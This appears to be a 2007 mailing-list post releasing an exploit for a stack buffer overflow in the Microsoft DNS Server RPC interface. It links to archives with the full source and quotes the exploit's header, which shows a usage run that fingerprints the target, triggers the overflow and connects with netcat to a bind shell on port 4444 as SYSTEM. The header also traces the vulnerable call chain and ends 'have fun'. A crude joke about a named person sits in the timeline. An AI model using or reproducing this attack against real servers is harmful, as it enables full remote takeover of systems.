Hi, Im sending you the headers of the new exploit code for microsoft DNS servers. You can download the full source code exploit and analysis at: - http://www.514.es/Microsoft_Dns_Server_Exploit.zip - http://www.48bits.com/exploits/dnsxpl.rar /* Microsoft DNS Server Remote Code execution Exploit and analysis Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx This remote exploit works against port 445 (also Microsoft RPC api used) Author: * Mario Ballano ( mballano~gmail.com ) * Andres Tarasco ( atarasco~gmail.com ) Timeline: * April,12,2007: Microsoft advisory published * April,13,2007: POC Exploit coded * April,14,2007: Microsoft notified about a new attack vector against port 445 (this exploit code) * April,14,2007: Working exploit for Windows 2000 server SP4 (Spanish) * April,15,2007: Working exploit for Windows 2003 server SP2 (Spanish) /GS bypassed * April,16,2007: hackers hax the w0rld and got busted. * April,xx,2007: Lammer release the first buggy worm * Xxxxx,xx,2007: Finally it was true. Nacked photos of Gary m.. being abducted were found at NSA servers Usage: D:\DNSTEST>dnstest.exe 192.168.1.7 ------------------------------------------------------- Microsoft Dns Server local & remote RPC Exploit code (port 445) Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish) ------------------------------------------------------- [+] Trying to fingerprint target.. 05 02 [+] Remote Host identified as Windows 2003 [+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:192.168.1.7[\\pipe\\dnsserver] [+] RpcBindingFromStringBinding returned 0x0 [+] Calling remote procedure DnssrvOperation() [+] Now try to connect to port 4444 D:\DNSTEST>nc 192.168.1.7 4444 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>whoami nt authority\system Vulnerability Analysis: The function Lookup_ZoneTreeNodeFromDottedName() uses a fixed local buffer to convert a string calling Name_ConvertFileNameToCountName(), this string can contain back-slash octal characters. Although some bounds checks are done when writting to the buffer is still possible to bypass them using a string with multiple backslashed chars, resulting in a stack based buffer overflow. This function can be reached through DNS RPC Interface, the execution flow will be as follows: R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd); // RPC Exported function R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd); RpcUtil_FindZone(buggybuffer,1,DesiredAccess); Zone_FindZoneByName(buggybuffer); // Here we go! Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000); Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0); // Using fixed size local buffer extractQuotedChar(x,x,buggybuffer); // Extract octal number Disassemblies at the end of the code: References: - Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server. (David Litchfield, NGSSoftware). - www.48bits.com - http://www.514.es Just compile the code with nmake and have fun! */